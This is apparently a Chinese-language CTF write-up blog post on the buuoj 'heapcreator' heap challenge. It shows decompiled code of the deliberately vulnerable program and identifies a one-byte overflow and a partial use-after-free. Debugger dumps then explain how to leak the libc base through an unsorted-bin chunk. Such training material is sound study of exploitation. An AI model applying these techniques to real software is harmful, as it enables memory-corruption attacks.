
<!DOCTYPE html>
<html lang="en" class="loading">
<head>
    <meta charset="UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
    <meta name="viewport" content="width=device-width, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no">
    <title>buuoj_heapcreator - Dreamcat</title>
    <meta name="apple-mobile-web-app-capable" content="yes" />
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <meta name="google" content="notranslate" />
    <meta name="keywords" content="Fechin,"> 
    <meta name="description" content="这次刷题记录开始着重整理下在Glibc-2.23下的一些利用姿势说明下buuoj的一些不好的地方，buuoj基本不会给libc,而有些没有后门的程序，往往需要去泄露libc的基地址，但是最近的一些题,"> 
    <meta name="author" content="dreamcat"> 
    <link rel="alternative" href="atom.xml" title="Dreamcat" type="application/atom+xml"> 
    <link rel="icon" href="/img/favicon.png"> 
    
    
    
    <meta name="twitter:card" content="summary"/>
    <meta name="twitter:title" content="buuoj_heapcreator - Dreamcat"/>
    <meta name="twitter:description" content="这次刷题记录开始着重整理下在Glibc-2.23下的一些利用姿势说明下buuoj的一些不好的地方，buuoj基本不会给libc,而有些没有后门的程序，往往需要去泄露libc的基地址，但是最近的一些题,"/>
    
    
    
    
    <meta property="og:site_name" content="Dreamcat"/>
    <meta property="og:type" content="object"/>
    <meta property="og:title" content="buuoj_heapcreator - Dreamcat"/>
    <meta property="og:description" content="这次刷题记录开始着重整理下在Glibc-2.23下的一些利用姿势说明下buuoj的一些不好的地方，buuoj基本不会给libc,而有些没有后门的程序，往往需要去泄露libc的基地址，但是最近的一些题,"/>
    
<link rel="stylesheet" href="/css/diaspora.css">

<meta name="generator" content="Hexo 6.1.0"></head>

<body class="loading">
    <span id="config-title" style="display:none">Dreamcat</span>
    <div id="loader"></div>
    <div id="single">
    <div id="top" style="display: block;">
    <div class="bar" style="width: 0;"></div>
    <a class="iconfont icon-home image-icon" href="javascript:;" data-url="http://example.com"></a>
    <div title="播放/暂停" class="iconfont icon-play"></div>
    <h3 class="subtitle">buuoj_heapcreator</h3>
    <div class="social">
        <div>
            <div class="share">
                <a title="获取二维码" class="iconfont icon-scan" href="javascript:;"></a>
            </div>
            <div id="qr"></div>
        </div>
    </div>
    <div class="scrollbar"></div>
</div>

    <div class="section">
        <div class="article">
    <div class='main'>
        <h1 class="title">buuoj_heapcreator</h1>
        <div class="stuff">
            <span>三月 20, 2022</span>
            
  <ul class="post-tags-list" itemprop="keywords"><li class="post-tags-list-item"><a class="post-tags-list-link" href="/tags/writeup/" rel="tag">writeup</a></li></ul>


        </div>
        <div class="content markdown">
            <h2 id="这次刷题记录开始着重整理下在Glibc-2-23下的一些利用姿势"><a href="#这次刷题记录开始着重整理下在Glibc-2-23下的一些利用姿势" class="headerlink" title="这次刷题记录开始着重整理下在Glibc-2.23下的一些利用姿势"></a>这次刷题记录开始着重整理下在Glibc-2.23下的一些利用姿势</h2><p>说明下buuoj的一些不好的地方，buuoj基本不会给libc,而有些没有后门的程序，往往需要去泄露libc的基地址，但是最近的一些题目很孬去匹配到正确的版本，我也就不清楚是什么问题了。这里就不过多赘述了，而匹配libc就不作为本文的一个要点。我们只要在本地同通过测试就好了</p>
<h2 id="浅析"><a href="#浅析" class="headerlink" title="浅析"></a>浅析</h2><p>题目环境以及保护<br>ubuntu16</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">$ checksec --file=heapcreator</span><br><span class="line">[*] <span class="string">&#x27;/home/giantbranch/Desktop/buuoj/heapcreater/heapcreator&#x27;</span></span><br><span class="line">    Arch:     amd64<span class="number">-64</span>-little</span><br><span class="line">    RELRO:    Partial RELRO</span><br><span class="line">    Stack:    Canary found</span><br><span class="line">    NX:       NX enabled</span><br><span class="line">    PIE:      No PIE (<span class="number">0x400000</span>)</span><br><span class="line">$ file heapcreator </span><br><span class="line">heapcreator: ELF <span class="number">64</span>-bit LSB executable, x86<span class="number">-64</span>, version <span class="number">1</span> (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86<span class="number">-64.</span>so<span class="number">.2</span>, <span class="keyword">for</span> GNU/Linux <span class="number">2.6</span><span class="number">.32</span>, BuildID[sha1]=<span class="number">5e69111</span>eca74cba2fb372dfcd3a59f93ca58f858, not stripped</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>程序呢并没有开启full relro,这里就首先反映到是不是可以修改函数的got表呢？根据题目描述，其实就已经断定了这是一个堆题。</p>
<p>接下来我们就主要看看其逻辑思路了</p>
<h3 id="main"><a href="#main" class="headerlink" title="main"></a>main</h3><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">int</span> __cdecl <span class="title function_">main</span><span class="params">(<span class="type">int</span> argc, <span class="type">const</span> <span class="type">char</span> **argv, <span class="type">const</span> <span class="type">char</span> **envp)</span></span><br><span class="line">&#123;</span><br><span class="line">  <span class="type">char</span> buf[<span class="number">8</span>]; <span class="comment">// [rsp+0h] [rbp-10h] BYREF</span></span><br><span class="line">  <span class="type">unsigned</span> __int64 v5; <span class="comment">// [rsp+8h] [rbp-8h]</span></span><br><span class="line"></span><br><span class="line">  v5 = __readfsqword(<span class="number">0x28</span>u);</span><br><span class="line">  setvbuf(_bss_start, <span class="number">0LL</span>, <span class="number">2</span>, <span class="number">0LL</span>);</span><br><span class="line">  setvbuf(<span class="built_in">stdin</span>, <span class="number">0LL</span>, <span class="number">2</span>, <span class="number">0LL</span>);</span><br><span class="line">  <span class="keyword">while</span> ( <span class="number">1</span> )</span><br><span class="line">  &#123;</span><br><span class="line">    menu();</span><br><span class="line">    read(<span class="number">0</span>, buf, <span class="number">4uLL</span>);</span><br><span class="line">    <span class="keyword">switch</span> ( atoi(buf) )</span><br><span class="line">    &#123;</span><br><span class="line">      <span class="keyword">case</span> <span class="number">1</span>:</span><br><span class="line">        create_heap();</span><br><span class="line">        <span class="keyword">break</span>;</span><br><span class="line">      <span class="keyword">case</span> <span class="number">2</span>:</span><br><span class="line">        edit_heap();</span><br><span class="line">        <span class="keyword">break</span>;</span><br><span class="line">      <span class="keyword">case</span> <span class="number">3</span>:</span><br><span class="line">        show_heap();</span><br><span class="line">        <span class="keyword">break</span>;</span><br><span class="line">      <span class="keyword">case</span> <span class="number">4</span>:</span><br><span class="line">        delete_heap();</span><br><span class="line">        <span class="keyword">break</span>;</span><br><span class="line">      <span class="keyword">case</span> <span class="number">5</span>:</span><br><span class="line">        <span class="built_in">exit</span>(<span class="number">0</span>);</span><br><span class="line">      <span class="keyword">default</span>:</span><br><span class="line">        <span class="built_in">puts</span>(<span class="string">&quot;Invalid Choice&quot;</span>);</span><br><span class="line">        <span class="keyword">break</span>;</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>经典的分支结构</p>
<h3 id="MENU"><a href="#MENU" class="headerlink" title="MENU"></a>MENU</h3><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">int</span> <span class="title function_">menu</span><span class="params">()</span></span><br><span class="line">&#123;</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">&quot;--------------------------------&quot;</span>);</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">&quot;          Heap Creator          &quot;</span>);</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">&quot;--------------------------------&quot;</span>);</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">&quot; 1. Create a Heap               &quot;</span>);</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">&quot; 2. Edit a Heap                 &quot;</span>);</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">&quot; 3. Show a Heap                 &quot;</span>);</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">&quot; 4. Delete a Heap               &quot;</span>);</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">&quot; 5. Exit                        &quot;</span>);</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">&quot;--------------------------------&quot;</span>);</span><br><span class="line">  <span class="keyword">return</span> <span class="built_in">printf</span>(<span class="string">&quot;Your choice :&quot;</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h3 id="Creat"><a href="#Creat" class="headerlink" title="Creat"></a>Creat</h3><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">unsigned</span> __int64 <span class="title function_">create_heap</span><span class="params">()</span></span><br><span class="line">&#123;</span><br><span class="line">  trr *v0; <span class="comment">// rbx</span></span><br><span class="line">  <span class="type">int</span> i; <span class="comment">// [rsp+4h] [rbp-2Ch]</span></span><br><span class="line">  <span class="type">size_t</span> size; <span class="comment">// [rsp+8h] [rbp-28h]</span></span><br><span class="line">  <span class="type">char</span> buf[<span class="number">8</span>]; <span class="comment">// [rsp+10h] [rbp-20h] BYREF</span></span><br><span class="line">  <span class="type">unsigned</span> __int64 v5; <span class="comment">// [rsp+18h] [rbp-18h]</span></span><br><span class="line"></span><br><span class="line">  v5 = __readfsqword(<span class="number">0x28</span>u);</span><br><span class="line">  <span class="keyword">for</span> ( i = <span class="number">0</span>; i &lt;= <span class="number">9</span>; ++i )</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="keyword">if</span> ( !*(&amp;heaparray + i) )</span><br><span class="line">    &#123;</span><br><span class="line">      *(&amp;heaparray + i) = (trr *)<span class="built_in">malloc</span>(<span class="number">0x10</span>uLL);</span><br><span class="line">      <span class="keyword">if</span> ( !*(&amp;heaparray + i) )</span><br><span class="line">      &#123;</span><br><span class="line">        <span class="built_in">puts</span>(<span class="string">&quot;Allocate Error&quot;</span>);</span><br><span class="line">        <span class="built_in">exit</span>(<span class="number">1</span>);</span><br><span class="line">      &#125;</span><br><span class="line">      <span class="built_in">printf</span>(<span class="string">&quot;Size of Heap : &quot;</span>);</span><br><span class="line">      read(<span class="number">0</span>, buf, <span class="number">8uLL</span>);</span><br><span class="line">      size = atoi(buf);</span><br><span class="line">      v0 = *(&amp;heaparray + i);</span><br><span class="line">      v0-&gt;ptr = (__int64)<span class="built_in">malloc</span>(size);</span><br><span class="line">      <span class="keyword">if</span> ( !(*(&amp;heaparray + i))-&gt;ptr )</span><br><span class="line">      &#123;</span><br><span class="line">        <span class="built_in">puts</span>(<span class="string">&quot;Allocate Error&quot;</span>);</span><br><span class="line">        <span class="built_in">exit</span>(<span class="number">2</span>);</span><br><span class="line">      &#125;</span><br><span class="line">      (*(&amp;heaparray + i))-&gt;size = size;</span><br><span class="line">      <span class="built_in">printf</span>(<span class="string">&quot;Content of heap:&quot;</span>);</span><br><span class="line">      read_input((*(&amp;heaparray + i))-&gt;ptr, size);</span><br><span class="line">      <span class="built_in">puts</span>(<span class="string">&quot;SuccessFul&quot;</span>);</span><br><span class="line">      <span class="keyword">return</span> __readfsqword(<span class="number">0x28</span>u) ^ v5;</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">return</span> __readfsqword(<span class="number">0x28</span>u) ^ v5;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="type">ssize_t</span> __fastcall <span class="title function_">read_input</span><span class="params">(<span class="type">void</span> *a1, <span class="type">size_t</span> a2)</span></span><br><span class="line">&#123;</span><br><span class="line">  <span class="type">ssize_t</span> result; <span class="comment">// rax</span></span><br><span class="line"></span><br><span class="line">  result = read(<span class="number">0</span>, a1, a2);</span><br><span class="line">  <span class="keyword">if</span> ( (<span class="type">int</span>)result &lt;= <span class="number">0</span> )</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">&quot;Error&quot;</span>);</span><br><span class="line">    _exit(<span class="number">-1</span>);</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">return</span> result;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>看creat的时候，首先可以看看是否存在溢出的可能。但是这道题这里没有什么溢出的可能。但是可以修改堆块的prev_size</p>
<h3 id="Edit"><a href="#Edit" class="headerlink" title="Edit"></a>Edit</h3><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">unsigned</span> __int64 <span class="title function_">edit_heap</span><span class="params">()</span></span><br><span class="line">&#123;</span><br><span class="line">  <span class="type">int</span> v1; <span class="comment">// [rsp+Ch] [rbp-14h]</span></span><br><span class="line">  <span class="type">char</span> buf[<span class="number">8</span>]; <span class="comment">// [rsp+10h] [rbp-10h] BYREF</span></span><br><span class="line">  <span class="type">unsigned</span> __int64 v3; <span class="comment">// [rsp+18h] [rbp-8h]</span></span><br><span class="line"></span><br><span class="line">  v3 = __readfsqword(<span class="number">0x28</span>u);</span><br><span class="line">  <span class="built_in">printf</span>(<span class="string">&quot;Index :&quot;</span>);</span><br><span class="line">  read(<span class="number">0</span>, buf, <span class="number">4uLL</span>);</span><br><span class="line">  v1 = atoi(buf);</span><br><span class="line">  <span class="keyword">if</span> ( v1 &lt; <span class="number">0</span> || v1 &gt; <span class="number">9</span> )</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">&quot;Out of bound!&quot;</span>);</span><br><span class="line">    _exit(<span class="number">0</span>);</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">if</span> ( *(&amp;heaparray + v1) )</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;Content of heap : &quot;</span>);</span><br><span class="line">    read_input((<span class="type">void</span> *)(*(&amp;heaparray + v1))-&gt;ptr, (*(&amp;heaparray + v1))-&gt;size + <span class="string">&#x27;\x01&#x27;</span>);<span class="comment">// 1字节溢出</span></span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">&quot;Done !&quot;</span>);</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">else</span></span><br><span class="line">  &#123;</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">&quot;No such heap !&quot;</span>);</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">return</span> __readfsqword(<span class="number">0x28</span>u) ^ v3;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>但是当我们看到edit函数的时候，但到了这里有一个非常显眼的1字节溢出，所以后续考虑OFF_BY_ONE攻击手法与其他手法配合使用</p>
<h3 id="Show"><a href="#Show" class="headerlink" title="Show"></a>Show</h3><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">unsigned</span> __int64 <span class="title function_">show_heap</span><span class="params">()</span></span><br><span class="line">&#123;</span><br><span class="line">  <span class="type">int</span> v1; <span class="comment">// [rsp+Ch] [rbp-14h]</span></span><br><span class="line">  <span class="type">char</span> buf[<span class="number">8</span>]; <span class="comment">// [rsp+10h] [rbp-10h] BYREF</span></span><br><span class="line">  <span class="type">unsigned</span> __int64 v3; <span class="comment">// [rsp+18h] [rbp-8h]</span></span><br><span class="line"></span><br><span class="line">  v3 = __readfsqword(<span class="number">0x28</span>u);</span><br><span class="line">  <span class="built_in">printf</span>(<span class="string">&quot;Index :&quot;</span>);</span><br><span class="line">  read(<span class="number">0</span>, buf, <span class="number">4uLL</span>);</span><br><span class="line">  v1 = atoi(buf);</span><br><span class="line">  <span class="keyword">if</span> ( v1 &lt; <span class="number">0</span> || v1 &gt; <span class="number">9</span> )</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">&quot;Out of bound!&quot;</span>);</span><br><span class="line">    _exit(<span class="number">0</span>);</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">if</span> ( *(&amp;heaparray + v1) )</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;Size : %ld\nContent : %s\n&quot;</span>, (*(&amp;heaparray + v1))-&gt;size, (<span class="type">const</span> <span class="type">char</span> *)(*(&amp;heaparray + v1))-&gt;ptr);</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">&quot;Done !&quot;</span>);</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">else</span></span><br><span class="line">  &#123;</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">&quot;No such heap !&quot;</span>);</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">return</span> __readfsqword(<span class="number">0x28</span>u) ^ v3;</span><br></pre></td></tr></table></figure>

<p>show这里也没有什么特殊的，</p>
<h3 id="Free"><a href="#Free" class="headerlink" title="Free"></a>Free</h3><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">unsigned</span> __int64 <span class="title function_">delete_heap</span><span class="params">()</span></span><br><span class="line">&#123;</span><br><span class="line">  <span class="type">int</span> v1; <span class="comment">// [rsp+Ch] [rbp-14h]</span></span><br><span class="line">  <span class="type">char</span> buf[<span class="number">8</span>]; <span class="comment">// [rsp+10h] [rbp-10h] BYREF</span></span><br><span class="line">  <span class="type">unsigned</span> __int64 v3; <span class="comment">// [rsp+18h] [rbp-8h]</span></span><br><span class="line"></span><br><span class="line">  v3 = __readfsqword(<span class="number">0x28</span>u);</span><br><span class="line">  <span class="built_in">printf</span>(<span class="string">&quot;Index :&quot;</span>);</span><br><span class="line">  read(<span class="number">0</span>, buf, <span class="number">4uLL</span>);</span><br><span class="line">  v1 = atoi(buf);</span><br><span class="line">  <span class="keyword">if</span> ( v1 &lt; <span class="number">0</span> || v1 &gt; <span class="number">9</span> )</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">&quot;Out of bound!&quot;</span>);</span><br><span class="line">    _exit(<span class="number">0</span>);</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">if</span> ( *(&amp;heaparray + v1) )</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="built_in">free</span>((<span class="type">void</span> *)(*(&amp;heaparray + v1))-&gt;ptr);</span><br><span class="line">    <span class="built_in">free</span>(*(&amp;heaparray + v1));</span><br><span class="line">    *(&amp;heaparray + v1) = <span class="number">0LL</span>;                   <span class="comment">// 只清空了heaparray,结构体中指针未清空，</span></span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">&quot;Done !&quot;</span>);</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">else</span></span><br><span class="line">  &#123;</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">&quot;No such heap !&quot;</span>);</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">return</span> __readfsqword(<span class="number">0x28</span>u) ^ v3;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>free模块这里，其实仔细看，会发现虽然free后将bss段上的指针清空了，但是结构体的ptr成员并没有清空，但是这了uaf并不是很容易利用。因为bss段上的指针被清空了</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">trr</span>&#123;</span></span><br><span class="line">	<span class="type">size_t</span> size; 		<span class="comment">//记录大小</span></span><br><span class="line">	<span class="type">void</span> * ptr;			<span class="comment">//储存我们输入Content</span></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">ss:<span class="number">00000000006020</span>A0 ; trr *heaparray</span><br><span class="line">.bss:<span class="number">00000000006020</span>A0 heaparray       dq ?                    ; DATA XREF: create_heap+<span class="number">31</span>↑r</span><br><span class="line">.bss:<span class="number">00000000006020</span>A0                                         ; create_heap+<span class="number">54</span>↑w ...</span><br><span class="line">.bss:<span class="number">00000000006020</span>A8                 db    ? ;</span><br><span class="line">.bss:<span class="number">00000000006020</span>A9                 db    ? ;</span><br><span class="line">.bss:<span class="number">00000000006020</span>AA                 db    ? ;</span><br><span class="line">.bss:<span class="number">00000000006020</span>AB                 db    ? ;</span><br><span class="line">.bss:<span class="number">00000000006020</span>AC                 db    ? ;</span><br><span class="line">.bss:<span class="number">00000000006020</span>AD                 db    ? ;</span><br><span class="line">.bss:<span class="number">00000000006020</span>AE                 db    ? ;</span><br><span class="line">.bss:<span class="number">00000000006020</span>AF                 db    ? ;</span><br><span class="line">.bss:<span class="number">00000000006020B</span>0                 db    ? ;</span><br><span class="line">.bss:<span class="number">00000000006020B</span>1                 db    ? ;</span><br><span class="line">.bss:<span class="number">00000000006020B</span>2                 db    ? ;</span><br><span class="line">.bss:<span class="number">00000000006020B</span>3                 db    ? ;</span><br><span class="line">.bss:<span class="number">00000000006020B</span>4                 db    ? ;</span><br></pre></td></tr></table></figure>

<p>题目大概就是这样，初步我们看到了一个off_by_one漏洞，以及一个不是很理想UAF</p>
<h2 id="pwning"><a href="#pwning" class="headerlink" title="pwning"></a>pwning</h2><h3 id="开始前的准备"><a href="#开始前的准备" class="headerlink" title="开始前的准备"></a>开始前的准备</h3><p>首先这个题并没有后门，那么我们就要去泄露libc的基地址。然后再去考虑其他的</p>
<h3 id="leak-the-libc-base"><a href="#leak-the-libc-base" class="headerlink" title="leak the libc_base"></a>leak the libc_base</h3><p>这里我们关注到的是在申请到堆块之后，并没有对其进行初始化，只是对储存有content的堆块检查读入的数据是否为0字节，也就是说我们至少读入一个字节，不过因为使用的read函数，所以不会自动的添加换行符，但这无所谓，这里将一个比较常用的unsortedbins泄露基地址main_arena.当一个较大的chunk超过了fastbins的范围，就会被加入unsortedbins双链表中。其实，第一个堆块的fd,bk指针会指向main_arena+x,。当我们再次申请到这个chunk时，其fd,bk指针不会被清空，只是会被我们输入的content覆盖。但是我们输入的content只检查了至少输入一个字节，而且允许我们输入’\x00’空字符。</p>
<p>那么这里就有了完整的泄露的思路</p>
<p>申请一个0x80的堆块（实际得到的0x90）,然后将其释放。因为这个是一个嵌套的堆块，delete的时候先释放content,再释放struct</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">pwndbg&gt; x/<span class="number">4</span>gx <span class="number">0x2368000</span>			<span class="comment">//struct_trr</span></span><br><span class="line"><span class="number">0x2368000</span>:	<span class="number">0x0000000000000000</span>	<span class="number">0x0000000000000021</span></span><br><span class="line"><span class="number">0x2368010</span>:	<span class="number">0x0000000000000080</span>	<span class="number">0x0000000002368030</span></span><br><span class="line">pwndbg&gt; x/<span class="number">4</span>gx <span class="number">0x2368020</span>			<span class="comment">//content</span></span><br><span class="line"><span class="number">0x2368020</span>:	<span class="number">0x0000000000000000</span>	<span class="number">0x0000000000000091</span></span><br><span class="line"><span class="number">0x2368030</span>:	<span class="number">0x0000000000000000</span>	<span class="number">0x0000000000000000</span></span><br></pre></td></tr></table></figure>

<p>free后</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">pwndbg&gt; bins</span><br><span class="line">fastbins</span><br><span class="line"><span class="number">0x20</span>: <span class="number">0x2368000</span> ◂— <span class="number">0x0</span></span><br><span class="line"><span class="number">0x30</span>: <span class="number">0x0</span></span><br><span class="line"><span class="number">0x40</span>: <span class="number">0x0</span></span><br><span class="line"><span class="number">0x50</span>: <span class="number">0x0</span></span><br><span class="line"><span class="number">0x60</span>: <span class="number">0x0</span></span><br><span class="line"><span class="number">0x70</span>: <span class="number">0x0</span></span><br><span class="line"><span class="number">0x80</span>: <span class="number">0x0</span></span><br><span class="line">unsortedbin</span><br><span class="line">all: <span class="number">0x2368020</span> —▸ <span class="number">0x7fb1f48beb78</span> (main_arena+<span class="number">88</span>) ◂— <span class="number">0x2368020</span></span><br><span class="line">smallbins</span><br><span class="line">empty</span><br><span class="line">largebins</span><br><span class="line"></span><br><span class="line">##########################################################<span class="meta">#    </span></span><br><span class="line"><span class="meta">pwndbg&gt; x/4gx 0x2368020</span></span><br><span class="line"><span class="number">0x2368020</span>:	<span class="number">0x0000000000000000</span>	<span class="number">0x0000000000000091</span></span><br><span class="line"><span class="number">0x2368030</span>:	<span class="number">0x00007fb1f48beb78</span>	<span class="number">0x00007fb1f48beb78</span></span><br></pre></td></tr></table></figure>

<p>重新申请后，只要控制conten的长度不会将bk指针释放释放，同时字符串可以将bk链接起来，就可以再show的时候，将bk泄露出来</p>
